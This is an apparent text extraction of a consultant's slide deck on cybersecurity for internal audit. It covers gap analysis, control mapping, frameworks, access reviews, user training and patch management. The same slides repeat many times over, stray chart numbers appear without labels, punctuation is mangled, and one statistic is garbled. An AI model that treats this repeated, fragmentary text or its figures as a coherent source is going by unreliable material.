bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa